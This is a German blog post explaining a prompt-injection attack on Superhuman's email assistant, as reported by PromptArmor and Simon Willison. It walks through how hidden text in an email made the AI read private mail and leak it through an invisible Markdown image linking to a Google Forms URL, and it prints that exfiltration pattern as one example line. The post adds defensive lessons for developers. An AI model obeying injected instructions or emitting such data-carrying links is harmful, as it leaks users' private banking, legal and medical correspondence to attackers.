Stell dir vor: Du bittest deine E-Mail-KI, die letzten Nachrichten zusammenzufassen. Was du nicht weißt: Eine harmlos aussehende E-Mail enthält versteckte Anweisungen, die die KI dazu bringen, sensible Inhalte aus deiner gesamten Inbox – Bank, Anwalt, Arzt – an einen Angreifer zu übermitteln. Genau das ist bei Superhuman passiert, wie Simon Willison berichtet.

Eine KI-generierte Übersicht des Workflows!

Der Angriff im Detail

Der Sicherheitsforscher von PromptArmor hat einen bemerkenswerten Angriffsvektor aufgedeckt:

  1. Die Falle: Ein Angreifer schickt eine E-Mail mit verstecktem Text (Prompt Injection). Der Text ist für dich unsichtbar, aber die KI liest ihn.
  2. Der Trigger: Du fragst Superhuman's KI Fass meine letzten E-Mails zusammen.
  3. Die Manipulation: Die KI folgt den versteckten Anweisungen und liest sensible E-Mails aus deiner Inbox.
  4. Die Exfiltration: Die KI verpackt die Daten in eine URL und bettet sie als unsichtbares Markdown-Bild ein:
![](https://docs.google.com/forms/d/xxx/formResponse?entry.123=GEHEIME_DATEN)
  1. Der Diebstahl: Dein Browser lädt das "Bild" – aber Google Forms speichert stattdessen die übermittelten Daten.

Das Perfide: Du merkst nichts. Du siehst nur die normale Zusammenfassung.

Warum hat das funktioniert?

Drei Faktoren kamen zusammen:

  1. CSP erlaubte docs.google.com: Die Content Security Policy ließ Bilder von dieser Domain zu – klingt ja vertrauenswürdig.
  2. Google Forms als Datensenke: Forms nimmt Daten auch per GET-Request an, also einfach über URL-Parameter.
  3. KI mit vollem Zugriff: Der Assistent hatte Leserechte auf alle E-Mails und konnte Markdown ausgeben.

Was Entwickler daraus lernen sollten

Dieser Fall zeigt ein grundsätzliches Problem bei KI-Integrationen:

Jede Kombination aus KI + externe Inhalte + Rich-Text-Rendering ist ein potenzielles Exfiltrations-Risiko.

Konkret:

  • Content Security Policy (CSP) allein reicht nicht. Auch "vertrauenswürdige" Domains können unbeabsichtigt als Datensenke funktionieren.
  • Markdown/HTML-Rendering ist gefährlich, wenn die KI Zugriff auf sensible Daten hat.
  • Prompt Injections sind real. Wenn deine KI externe Inhalte verarbeitet, musst du damit rechnen, dass Angreifer versuchen, sie zu manipulieren.

Was Superhuman richtig gemacht hat

Credit where credit is due: Superhuman hat das Problem laut promptamor.com als High-Priority-Incident behandelt und schnell einen Fix ausgerollt. Das ist die richtige Reaktion – viele Unternehmen hätten das Problem heruntergespielt oder langsamer reagiert.

Fazit

KI-Features in Produkten sind verlockend, aber sie eröffnen völlig neue Angriffsvektoren. Als Entwickler müssen wir verstehen: Wenn wir einer KI Zugriff auf sensible Daten geben und sie gleichzeitig externe Inhalte verarbeiten lassen, bauen wir potenzielle Exfiltrationspfade.

Die Frage ist nicht ob Angreifer Prompt Injections versuchen werden – sondern wann.


Quelle: PromptArmor Research + simonwillison.net